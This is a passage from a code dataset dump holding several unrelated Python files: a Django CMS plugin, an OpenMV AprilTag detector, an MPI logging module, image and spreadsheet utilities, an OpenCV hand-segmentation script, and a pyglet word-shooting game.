import conf\nfrom .models import Column\n\n\nclass ColumnPluginForm(forms.ModelForm):\n class Meta:\n model = Column\n fields = conf.COLUMN_FIELDS\n widgets = {\n 'bg_color': forms.Select(\n choices=conf.COLUMN_BACKGROUND_COLORS\n ),\n 'css_class': forms.Select(\n choices=conf.COLUMN_CSS_CLASSES\n ),\n 'height': forms.Select(\n choices=conf.COLUMN_HEIGHTS\n ),\n 'width': forms.RadioSelect(\n choices=conf.COLUMN_WIDTHS\n ),\n }\n\n\nclass ColumnPlugin(CMSPluginBase):\n allow_children = True\n child_classes = conf.COLUMN_PLUGINS\n exclude = conf.COLUMN_EXCLUDE\n fieldsets = conf.COLUMN_FIELDSETS\n form = ColumnPluginForm\n model = Column\n module = _('layout')\n name = _('column')\n render_template = 'cms/plugins/columns_column.html'\n\n def render(self, context, instance, placeholder):\n request = context['request']\n context.update({\n 'object': instance,\n 'placeholder':placeholder,\n 'indicator_hidden': get_indicator_hidden(request, instance),\n })\n return context\n\nplugin_pool.register_plugin(ColumnPlugin)\n","sub_path":"columns/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"645687645","text":"# AprilTags Example\n#\n# This example shows the power of the OpenMV Cam to detect April Tags\n# on the OpenMV Cam M7. The M4 versions cannot detect April Tags.\n\n\nimport machine, gc,utime\nfrom pyb import LED\nimport sensor, image, time, math\nimport LPF2Class\n\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QQVGA) # we run out of memory if the resolution is much bigger...\nsensor.skip_frames(time = 2000)\nsensor.set_auto_gain(False) # must turn this off to prevent image washout...\nsensor.set_auto_whitebal(False) # must turn this off to prevent image washout...\n\nprint(\"made it here\")\n\n# Note! 
Unlike find_qrcodes the find_apriltags method does not need lens correction on the image to work.\n\n# The apriltag code supports up to 6 tag families which can be processed at the same time.\n# Returned tag objects will have their tag family and id within the tag family.\n\ntag_families = 0\ntag_families |= image.TAG16H5 # comment out to disable this family\ntag_families |= image.TAG25H7 # comment out to disable this family\ntag_families |= image.TAG25H9 # comment out to disable this family\ntag_families |= image.TAG36H10 # comment out to disable this family\ntag_families |= image.TAG36H11 # comment out to disable this family (default family)\ntag_families |= image.ARTOOLKIT # comment out to disable this family\n\n# What's the difference between tag families? Well, for example, the TAG16H5 family is effectively\n# a 4x4 square tag. So, this means it can be seen at a longer distance than a TAG36H11 tag which\n# is a 6x6 square tag. However, the lower H value (H5 versus H11) means that the false positve\n# rate for the 4x4 tag is much, much, much, higher than the 6x6 tag. 
So, unless you have a\n# reason to use the other tags families just use TAG36H11 which is the default family.\n\ndef family_name(tag):\n if(tag.family() == image.TAG16H5):\n return \"TAG16H5\"\n if(tag.family() == image.TAG25H7):\n return \"TAG25H7\"\n if(tag.family() == image.TAG25H9):\n return \"TAG25H9\"\n if(tag.family() == image.TAG36H10):\n return \"TAG36H10\"\n if(tag.family() == image.TAG36H11):\n return \"TAG36H11\"\n if(tag.family() == image.ARTOOLKIT):\n return \"ARTOOLKIT\"\n\n\nprint(\"hi\")\nred_led=LED(1)\nred_led.on()\nlpf2 = LPF2Class.LPF2(3, 'P4', 'P5') # OpenMV\nprint(\"ugh\")\nlpf2.initialize()\n\nprint(\"initialized\")\n\nwhile True:\n if not lpf2.connected:\n red_led.on()\n utime.sleep(1)\n lpf2.initialize()\n\n else:\n red_led.off()\n while lpf2.connected:\n gc.collect()\n img = sensor.snapshot()\n for tag in img.find_apriltags(families=tag_families): # defaults to TAG36H11 without \"families\".\n img.draw_rectangle(tag.rect(), color = (255, 0, 0))\n img.draw_cross(tag.cx(), tag.cy(), color = (0, 255, 0))\n print_args = (family_name(tag), tag.id(), (180 * tag.rotation()) / math.pi)\n print(\"APRIL TAG \" + str(tag.id()))\n lpf2.send_value(int(tag.id()))\n utime.sleep(0.1)\n","sub_path":"​SPIKE Prime Backpacks/OpenMVCamera/AprilTagDetection/PythonIDE/AprilTags.py","file_name":"AprilTags.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98689984","text":"import sys\nimport logging\nfrom mpi4py import MPI\n\ndef err_out_screen(err_msg):\n \"\"\"\n Generic routine to exit the program gracefully. This specific error function does not log\n error messages to the log file, but simply prints them out to the screen. 
This is function\n is designed specifically for early in the program execution where a log file hasn't been\n established yet.\n Logan Karsten - National Center for Atmospheric Research, karsten@ucar.edu\n \"\"\"\n\n err_msg_out = 'ERROR: ' + err_msg\n print(err_msg_out)\n sys.exit(1)\n\ndef err_out_screen_para(err_msg,MpiConfig):\n \"\"\"\n Generic function for printing an error message to the screen and aborting MPI.\n This should only be called if logging cannot occur and an abrupt end the program\n is neded.\n :param err_msg:\n :param MpiConfig:\n :return:\n \"\"\"\n err_msg_out = 'ERROR: RANK - ' + str(MpiConfig.rank) + ' : ' + err_msg\n print(err_msg_out)\n MpiConfig.comm.Abort()\n sys.exit(1)\n\ndef check_program_status(ConfigOptions,MpiConfig):\n \"\"\"\n Generic function to check the err statuses for each processor in the program.\n If any flags come back, gracefully exit the program.\n :param ConfigOptions:\n :param MpiConfig:\n :return:\n \"\"\"\n # Sync up processors to ensure everyone is on the same page.\n MpiConfig.comm.barrier()\n\n # Collect values from each processor.\n data = MpiConfig.comm.gather(ConfigOptions.errFlag, root=0)\n if MpiConfig.rank == 0:\n for i in range(MpiConfig.size):\n if data[i] != 0:\n MpiConfig.comm.Abort()\n sys.exit(1)\n else:\n assert data is None\n\n # Sync up processors.\n MpiConfig.comm.barrier()\n\ndef init_log(ConfigOptions,MpiConfig):\n \"\"\"\n Function for initializing log file for individual forecast cycles. 
Each\n log file is unique to the instant the program was initialized.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n ConfigOptions.errMsg = \"Unable to create logging object \" \\\n \"for: \" + ConfigOptions.logFile\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n try:\n formatter = logging.Formatter('[%(asctime)s]: %(levelname)s '\n '- %(message)s', '%m/%d %H:%M:%S')\n except:\n ConfigOptions.errMsg = \"Unable to establish formatting for logger.\"\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n try:\n ConfigOptions.logHandle = logging.FileHandler(ConfigOptions.logFile,mode='a')\n except:\n ConfigOptions.errMsg = \"Unable to create log file handle for: \" + \\\n ConfigOptions.logFile\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n try:\n ConfigOptions.logHandle.setFormatter(formatter)\n except:\n ConfigOptions.errMsg = \"Unable to set formatting for: \" + \\\n ConfigOptions.logFile\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n try:\n logObj.addHandler(ConfigOptions.logHandle)\n except:\n ConfigOptions.errMsg = \"ERROR: Unable to add log handler for: \" + \\\n ConfigOptions.logFile\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n\ndef err_out(ConfigOptions):\n \"\"\"\n Function to error out after an error message has been logged for a\n forecast cycle. 
We will exit with a non-zero exit status.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n ConfigOptions.errMsg = \"Unable to obtain a logger object for: \" + \\\n ConfigOptions.logFile\n raise Exception()\n try:\n logObj.setLevel(logging.ERROR)\n except:\n ConfigOptions.errMsg = \"Unable to set ERROR logger level for: \" + \\\n ConfigOptions.logFile\n raise Exception()\n try:\n logObj.error(ConfigOptions.errMsg)\n except:\n ConfigOptions.errMsg = \"Unable to write error message to: \" + \\\n ConfigOptions.logFile\n raise Exception()\n MPI.Finalize()\n sys.exit(1)\n\ndef log_error(ConfigOptions,MpiConfig):\n \"\"\"\n Function to log an error message to the log file.\n :param ConfigOptions:\n :param MpiConfig:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.setLevel(logging.ERROR)\n except:\n err_out_screen_para(('Unable to set ERROR logger level on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.error(\"RANK: \" + str(MpiConfig.rank) + \" - \" + ConfigOptions.errMsg)\n except:\n err_out_screen_para(('Unable to write ERROR message on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n ConfigOptions.errFlag = 1\n\ndef log_critical(ConfigOptions,MpiConfig):\n \"\"\"\n Function for logging an error message without exiting without a\n non-zero exit status.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.setLevel(logging.CRITICAL)\n except:\n err_out_screen_para(('Unable to set CRITICAL logger level on RANK: ' + 
str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.critical(\"RANK: \" + str(MpiConfig.rank) + \" - \" + ConfigOptions.errMsg)\n except:\n err_out_screen_para(('Unable to write CRITICAL message on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n ConfigOptions.errFlag = 1\n\ndef log_warning(ConfigOptions,MpiConfig):\n \"\"\"\n Function to log warning messages to the log file.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.setLevel(logging.WARNING)\n except:\n err_out_screen_para(('Unable to set WARNING logger level on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.warning(\"RANK: \" + str(MpiConfig.rank) + \" - \" + ConfigOptions.statusMsg)\n except:\n err_out_screen_para(('Unable to write WARNING message on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n\ndef log_msg(ConfigOptions,MpiConfig):\n \"\"\"\n Function to log INFO messages to a specified log file.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.setLevel(logging.INFO)\n except:\n err_out_screen_para(('Unable to set INFO logger level on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.info(\"RANK: \" + str(MpiConfig.rank) + \" - \" + ConfigOptions.statusMsg)\n except:\n err_out_screen_para(('Unable to write INFO message on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n\ndef 
close_log(ConfigOptions,MpiConfig):\n \"\"\"\n Function for closing a log file.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile), MpiConfig)\n try:\n logObj.removeHandler(ConfigOptions.logHandle)\n except:\n err_out_screen_para(('Unable to remove logging file handle on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile), MpiConfig)\n try:\n ConfigOptions.logHandle.close()\n except:\n err_out_screen_para(('Unable to close looging file: ' + ConfigOptions.logFile +\n ' on RANK: ' + str(MpiConfig.rank)),MpiConfig)\n ConfigOptions.logHandle = None","sub_path":"core/errMod.py","file_name":"errMod.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29962750","text":"\nimport os\nfrom PIL import Image\nimport shutil\nimport sys\nimage_size=144\n#改变之后的图片尺寸\n\nsource_path=os.getcwd()+\"/image/\"#等待转换的图片存放地址\ntypes='png' #转换后的图片格式\ntarget_path=os.getcwd()+\"/changepng/\"#转换过格式的图片存放地址\nfinal_path=os.getcwd()+\"/final/\"# 转换过格式和尺寸的图片存放地址\n\n#如果没有转换后的图片存放文件夹,就创建对应的文件夹\nif not os.path.exists(target_path):\n os.makedirs(target_path)\nif not os.path.exists(final_path):\n os.makedirs(final_path)\n\ndef changepng(source_path,types):\n files = []\n image_list=os.listdir(source_path)\n #print(image_list)\n files = [os.path.join(source_path,_) for _ in image_list]\n for index,jpg in enumerate(files):\n if index > 1000:\n break\n try:\n sys.stdout.write('\\r>>Converting image %d/100000 ' % (index))\n sys.stdout.flush()\n im = Image.open(jpg)\n png = os.path.splitext(jpg)[0] + \".\" + types\n im.save(png)\n shutil.move(png,target_path)\n except IOError as e:\n print('could not read:',jpg)\n print('error:',e)\n print('skip it\\n')\n sys.stdout.write('Convert Over!\\n')\n 
sys.stdout.flush()\n\n\nif __name__ == '__main__':\n path = r\"F:\\untitled7\\get_html\\imgs\"\n changepng(path, \"png\")\n","sub_path":"test1/test03.py","file_name":"test03.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"253184342","text":"import openpyxl\n\nclass Write_excel_xlsx_append(object):\n def __init__(self, path, value, sheet_name):\n self.path = path\n self.value = value\n self.sheet_name = sheet_name\n\n def write_excel_xlsx_append(self):\n \"\"\"向xls文件内写入(追加)内容\"\"\"\n\n # 写入内容格式[[], [],[]..]\n # 写��内容行数\n index = len(self.value)\n # 读模式打开文件\n work_book = openpyxl.load_workbook(self.path)\n # 定位sheet页\n work_sheet = work_book[self.sheet_name]\n # sheet页数据行数\n rows_old = work_sheet.max_row\n rows = lambda x: x-1 if x else 0\n row_old_real = rows(rows_old)\n print('原sheet页数据行数为: %s' % (row_old_real))\n # 追加内容\n for i in range(1, index+1):\n for j in range(1, len(self.value[i-1])+1):\n work_sheet.cell(rows_old+i-1, j).value = self.value[i-1][j-1]\n print('写入完成,%s页数据行数为: %s' % (self.sheet_name, rows_old + index))\n # 保存文件\n work_book.save(self.path)\n print('新数据保存成功')\n\n","sub_path":"read_write_apend_xlsx/write_xlsx.py","file_name":"write_xlsx.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547294470","text":"import cv2\n\nimport numpy as np\n\n\ndef Find(path):\n # 창 이름 설정\n\n cv2.namedWindow('image')\n\n # 이미지 파일 읽기\n\n img = cv2.imread(path, cv2.IMREAD_COLOR)\n\n # 이미지 사이즈 조정\n\n img = Resize(img)\n\n # 이미지 색 바꾸기\n\n # img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # img_ycrcb = cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)\n\n img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n # 잡음 제거\n\n img_hsv = cv2.fastNlMeansDenoisingColored(img_hsv, None, 10, 10, 7, 21)\n\n lower = np.array([0, 48, 80], dtype=\"uint8\")\n\n upper = np.array([20, 255, 255], 
dtype=\"uint8\")\n\n img_hand = cv2.inRange(img_hsv, lower, upper)\n\n # 경계선 찾음\n\n contours, hierarchy = cv2.findContours(img_hand, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n # 가장 큰 영역 찾기\n\n max = 0\n\n maxcnt = None\n\n for cnt in contours:\n\n area = cv2.contourArea(cnt)\n\n if (max < area):\n max = area\n\n maxcnt = cnt\n\n # maxcontours의 각 꼭지점 다각선 만들기\n\n hull = cv2.convexHull(maxcnt)\n\n # img 다 0으로 만들기?\n\n mask = np.zeros(img.shape).astype(img.dtype)\n\n color = [255, 255, 255]\n\n # 경계선 내부 255로 채우기\n\n cv2.fillPoly(mask, [maxcnt], color)\n\n img_hand = cv2.bitwise_and(img, mask)\n\n cv2.drawContours(img_hand, [maxcnt], 0, (255, 0, 0), 3)\n\n cv2.drawContours(img_hand, [hull], 0, (0, 255, 0), 3)\n\n # 이미지 보여주기\n\n cv2.imshow('image', img_hand)\n\n # 창 esc 끄기\n\n while True:\n\n if cv2.waitKey(0) == 27:\n cv2.destroyWindow('image')\n\n break;\n\n return\n\n\ndef Resize(img):\n print(img.shape)\n\n width = 500\n\n ratio = width / img.shape[1] # width * 사진 너비 = 비율\n\n height = int(ratio * img.shape[0]) # 비율 * 사진 높이\n\n # 축소 INTER_AREA\n\n # 확대 INTER_LINEAR\n\n resize = cv2.resize(img, dsize=(width, height), interpolation=cv2.INTER_AREA)\n\n # resize = cv2.resize(img, dsize = (0, 0), fx=1.5, fy=1.5, interpolation = cv2.INTER_AREA)\n\n print(resize.shape)\n\n return resize\n\n\n\nFind(\"ok3.jpg\")\n\n\n\n","sub_path":"python_source/딥러닝/hand.py","file_name":"hand.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"246446368","text":"##### IMPORT #####\nimport pyglet, random, math\nfrom pyglet import font\nfrom classes import Player, Feather, RotatingSprite, Window, Poetry\nfrom pyglet.window import mouse\n\n##### USEFUL SIMPLE FUNCTIONS #####\ndef center_image(image):\n \"\"\"\n Sets an image's anchor point to its center\n :param image: image\n :return: None\n \"\"\"\n image.anchor_x = image.width // 2 # put the anchor of the image at the half of its width\n 
image.anchor_y = image.height // 2 # put the anchor of the image at the half of its height\n\ndef distance(point_1=(0, 0), point_2=(0, 0)):\n '''\n Calculates the distance between two points.\n :param point_1: tuple\n :param point_2: tuple\n :return: float\n '''\n return math.sqrt(\n (point_1[0] - point_2[0]) ** 2 +\n (point_1[1] - point_2[1]) ** 2) # pythagore\n\n##### MUSIC #####\nmusicSource = pyglet.media.load('resources/sound/violin.wav')\nmusic = pyglet.media.Player()\nmusic.volume = 0.0005\n#Keep playing for as long as the app is running (or you tell it to stop):\nmusic.eos_action = pyglet.media.SourceGroup.loop\n\n##### GAME WINDOW #####\ngame_window = Window()\nx = game_window.width\ny = game_window.height\ngame = False #State of the game, on or off\n\n##### WALLPAPER #####\nwallpaper = pyglet.resource.image('resources/sprites/wallpaper.jpg')\nwallpaper_sprite = pyglet.sprite.Sprite(img=wallpaper, x=0, y=0)\n\n##### MENU ####\nclose_img = pyglet.resource.image('resources/sprites/close_game.png')\nclose_img2 = pyglet.resource.image('resources/sprites/close_game_grey.png')\nclose_scale = close_img.height/close_img.width\nclose = pyglet.sprite.Sprite(img=close_img,\n x=close_img.width*close_scale//4,\n y=y-int(2*close_img.height*close_scale)) #set position of close image\nclose.scale = close_scale\n\nrestart_img = pyglet.resource.image('resources/sprites/restart_game.png')\nrestart_img2 = pyglet.resource.image('resources/sprites/restart_game_grey.png')\nrestart_scale = restart_img.height/restart_img.width\nrestart = pyglet.sprite.Sprite(img=restart_img,\n x=restart_img.width*restart_scale//4,\n y=y-int(3.5*restart_img.height*restart_scale)) #set position of restart image\nrestart.scale = restart_scale\n\n##### BATCH #####\nbatch = pyglet.graphics.Batch()\n\n##### PARCHMENT #####\nparchment_image = pyglet.resource.image('resources/sprites/parchment.png')\ncenter_image(parchment_image)\nparchment_scale = parchment_image.height/parchment_image.width #Scale of 
the parchment\nparchment = pyglet.sprite.Sprite(img=parchment_image,\n x=x//2,\n y=parchment_image.height//2 + 20)\n\n##### PLAYER #####\nplayer_image = pyglet.resource.image('resources/sprites/player.png')\ncenter_image(player_image)\nplayer_sprite = Player(img=player_image,\n x=x//2,\n y=(y+2*parchment.y)//2,\n batch=batch) # set position of player as a Player instance\ngame_window.push_handlers(player_sprite)\n\n##### PLAYER LIVES #####\nplayer_lives = 3\nlive = pyglet.text.Label('Lives : ' + str(player_lives),\n font_name='Times New Roman',\n font_size=x/30,\n x=x-x//10, y=y-y//15,\n anchor_x='center', anchor_y='center')\n\n##### CIRCLE SEGMENTS #####\ncircle_segment = pyglet.resource.image(\"resources/sprites/circle_segment.png\")\ncenter_image(circle_segment)\n#Load the 15 segments with the RotatingSprite class\nfor i in range(15):\n angle_degrees = (360/15)*i # set the angle of every segment\n angle_radians = math.radians(angle_degrees)\n xc, yc = (x//2, (y+2*parchment.y)//2)\n r = x//6 #radius of the circle\n segment = RotatingSprite(angle_radians=angle_radians,\n r=r, xc=xc, yc=yc,\n word=RotatingSprite.words[i], img=circle_segment, batch=batch)\n RotatingSprite.segments.append(segment) #add the segment to the list which is updated\n RotatingSprite.all_segments.append(segment)\n\n##### POETRY #####\npoem = Poetry()\npoem.initialize()\nline = 0 #actual line of the poetry\n\n##### INRODUCTION AND GAME OVER LABEL #####\nintro_text = pyglet.text.Label('Press left mouse button to start',\n font_name='Times New Roman',\n font_size=x/30,\n italic=True,\n x=x//2, y=y//2,\n anchor_x='center', anchor_y='center')\n\ngame_over = pyglet.text.Label('Game Over',\n font_name='Times New Roman',\n font_size=x/30,\n italic=True,\n x=x//2, y=y//2,\n anchor_x='center', anchor_y='center')\n\nrestart_text = pyglet.text.Label('Press left mouse button to restart',\n font_name='Times New Roman',\n font_size=x/30,\n italic=True,\n x=x//2, y=y//3,\n anchor_x='center', 
anchor_y='center')\n\n##### GAME FUNCTIONS #####\ndef write_towards(poetry):\n global line\n toward = poetry.split_poetry()\n msg = ' '.join(toward[line]) #take the first verse\n label = pyglet.text.Label(str(msg),\n font_name='Times New Roman',\n font_size=18,\n color=(75, 0, 130, 255),\n x=parchment.x, y=parchment.y,\n anchor_x='center', anchor_y='center')\n label.draw() #write the sentence on the parchment\n\ndef chargeBar(player_sprite, player_image):\n '''\n Draws the line for the reloading time.\n :param player_sprite: sprite\n :param player_image: image\n :return: None\n '''\n player_start = player_sprite.x - player_sprite.width // 2\n\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n (\"v2f\", (player_start, player_sprite.y-(player_image.height)/1.2, player_start+2*(player_sprite.width*(player_sprite.reloading/60)), player_sprite.y-(player_image.height)/1.2))\n )\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n (\"v2f\", (player_start, player_sprite.y-(player_image.height)/1.2+1, player_start+2*(player_sprite.width*(player_sprite.reloading/60)), player_sprite.y-(player_image.height)/1.2+1))\n )\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n (\"v2f\", (player_start, player_sprite.y-(player_image.height)/1.2+2, player_start+2*(player_sprite.width*(player_sprite.reloading/60)), player_sprite.y-(player_image.height)/1.2+2))\n )\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n (\"v2f\", (player_start, player_sprite.y-(player_image.height)/1.2+3, player_start+2*(player_sprite.width*(player_sprite.reloading/60)), player_sprite.y-(player_image.height)/1.2+3))\n )\n\ndef in_sprite(sprite, x, y):\n '''\n Verifies if the coordonates (x, y) are in the sprite\n :param sprite: sprite\n :param x: int\n :param y: int\n :return: bool\n '''\n res = sprite.x <= x <= sprite.x + sprite.width and sprite.y <= y <= sprite.y + sprite.height\n return res\n\n@game_window.event\ndef on_draw():\n '''\n The draw function.\n :return: None\n '''\n global game, player_lives\n 
game_window.clear()\n wallpaper_sprite.draw()\n if game:\n restart.draw()\n close.draw()\n live.draw()\n game_window.fps_display.draw()\n parchment.draw()\n #Draw the player and the segments\n batch.draw()\n write_towards(poem)\n #Draw the segments\n for segment in RotatingSprite.segments:\n segment.label.draw()\n #Draw the reloading line\n chargeBar(player_sprite, player_image)\n #Draw every projectile\n for feather in Feather.feathers:\n feather.draw()\n #Draw the dead feathers\n for obj in RotatingSprite.intert_objects:\n obj.draw()\n else:\n if player_lives > 0:\n intro_text.draw()\n else:\n game_over.draw()\n restart_text.draw()\n\n@game_window.event\ndef on_mouse_press(x, y, button, modifiers):\n global game\n if mouse.LEFT == True:\n if game: #if the game is on or off\n if in_sprite(restart, x, y): #condition to press on the button\n game_restart()\n elif in_sprite(close, x, y):\n pyglet.app.exit()\n else:\n game_restart()\n game = True\n \n@game_window.event\ndef on_mouse_motion(x, y, dx, dy):\n '''\n Controls the animation of the two buttons.\n :return: None\n '''\n if restart.image == restart_img and in_sprite(restart, x, y): #turn the image in grey when mouse is on the restart button\n restart.image = restart_img2\n elif restart.image != restart_img and not in_sprite(restart, x, y):\n restart.image = restart_img\n\n if close.image == close_img and in_sprite(close, x, y): #turn the image in grey when mouse is on the close button\n close.image = close_img2\n elif close.image != close_img and not in_sprite(close, x, y):\n close.image = close_img\n\ndef game_restart():\n '''\n Restart the game and set all variables to their beginning state.\n '''\n global player_lives, line\n RotatingSprite.dead_segments.reverse() #segments in the order of their death\n for segment in RotatingSprite.dead_segments: # transform all dead segments back in segments but in the right order (reverse)\n segment.relive()\n RotatingSprite.words.insert(0, segment.word)\n 
RotatingSprite.dead_segments.clear() # clear the dead_segment list when restart\n RotatingSprite.intert_objects.clear() # clear the dead feathers when restart\n player_lives = 3\n line = 0\n\ndef update(dt):\n '''\n Updates the game objects every frame (60 times per second)\n :param dt: float\n :return: None\n '''\n global line, player_lives, game, live\n if game:\n player_sprite.update(dt)\n if len(Feather.feathers) > 0:\n for feather in Feather.feathers: # update position of all dead segments\n feather.update_position(dt)\n if len(RotatingSprite.segments) > 0:\n for segment in RotatingSprite.segments: # update position of all segments\n segment.update(dt)\n if len(RotatingSprite.dead_segments) > 0:\n for dead_segment in RotatingSprite.dead_segments: # update position of all dead segments\n dead_segment.update(dt)\n if len(RotatingSprite.intert_objects) > 0:\n for obj in RotatingSprite.intert_objects: #update position of the dead feathers\n obj.update(dt)\n\n if player_lives > 0:\n live.text = 'Lives : ' + str(player_lives)\n else:\n game = False\n\n ### Collision\n for feather in Feather.feathers:\n already_dead = False #prevent the delete of two segments with the same feather\n already_hit = False #prevent the delete of two lives with the same feather\n if distance(point_1=(feather.x, feather.y), point_2=(xc, yc)) > r - circle_segment.height//2: # check when a feather reaches the segments \n feather.dead = True # kill the feather\n if len(RotatingSprite.segments) > 0:\n for segment in RotatingSprite.all_segments: #even the dead segments\n if distance(point_1=(feather.x, feather.y), point_2=(segment.x, segment.y)) < 1.27 * r * math.sin(math.radians(360/15)/2): # check which segments is hit by the feather\n if not already_dead: # kill the segment if the feather has not kill one already\n if segment.word == RotatingSprite.words[0]:\n line += 1\n segment.dead = True\n segment.update(dt) # update the next segment in segment list (to prevent a bug)\n already_dead = 
True\n elif not already_hit:\n if player_lives > 0:\n player_lives -= 1\n already_hit = True\n else:\n print('Win')\n else:\n pass\n\nif __name__ == \"__main__\":\n\n pyglet.clock.schedule_interval(update, game_window.frame_rate) #Activate the update function (60 Hz)\n\n music.queue(musicSource)\n music.play()\n \n pyglet.app.run()","sub_path":"usr/duc/good project/circles.py","file_name":"circles.py","file_ext":"py","file_size_in_byte":12504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9450173","text":"from idlelib.idle_test.test_run import S\nfrom itertools import product\n\nfrom django.contrib.auth import logout, update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import SetPasswordForm\nfrom django.contrib.auth.models import User, Group\nfrom django.contrib import messages\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.db.models import Q\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom sbs.Forms.BeltExamForm import BeltExamForm\nfrom sbs.Forms.ClubForm import ClubForm\nfrom sbs.Forms.ClubRoleForm import ClubRoleForm\nfrom sbs.Forms.CommunicationForm import CommunicationForm\nfrom sbs.Forms.DisabledCommunicationForm import DisabledCommunicationForm\nfrom sbs.Forms.DisabledPersonForm import DisabledPersonForm\nfrom sbs.Forms.DisabledSportClubUserForm import DisabledSportClubUserForm\nfrom sbs.Forms.DisabledUserForm import DisabledUserForm\nfrom sbs.Forms.PersonForm import PersonForm\nfrom sbs.Forms.SportClubUserForm import SportClubUserForm\nfrom sbs.Forms.UserForm import UserForm\nfrom sbs.Forms.SearchClupForm import SearchClupForm\nfrom sbs.Forms.PreRegidtrationForm import PreRegistrationForm\nfrom sbs.Forms.UserSearchForm import UserSearchForm\nfrom sbs.Forms.ClupUserSearchForm import ClubSearchForm\n\nfrom sbs.models 
import SportsClub, SportClubUser, Communication, Person, BeltExam, Athlete, Coach, Level, CategoryItem, \\\n License\nfrom sbs.models.ClubRole import ClubRole\nfrom sbs.models.EnumFields import EnumFields\nfrom sbs.models.PreRegistration import PreRegistration\nfrom sbs.services import general_methods\nfrom datetime import date,datetime\nimport datetime\nfrom django.utils import timezone\n\nfrom zeep import Client\n# from sbs.models.Person import Person\n# from sbs.models.PreRegistration import PreRegistration\nfrom sbs.models.ReferenceReferee import ReferenceReferee\nfrom sbs.models.ReferenceCoach import ReferenceCoach\n\nfrom django.contrib.auth.models import Group, Permission, User\nfrom operator import itemgetter\n@login_required\ndef return_add_club(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n club_form = ClubForm()\n communication_form = CommunicationForm()\n\n if request.method == 'POST':\n\n club_form = ClubForm(request.POST, request.FILES or None)\n communication_form = CommunicationForm(request.POST, request.FILES)\n\n if club_form.is_valid():\n clubsave = SportsClub(name=club_form.cleaned_data['name'],\n shortName=club_form.cleaned_data['shortName'],\n foundingDate=club_form.cleaned_data['foundingDate'],\n logo=club_form.cleaned_data['logo'],\n clubMail=club_form.cleaned_data['clubMail'],\n isFormal=club_form.cleaned_data['isFormal'],\n 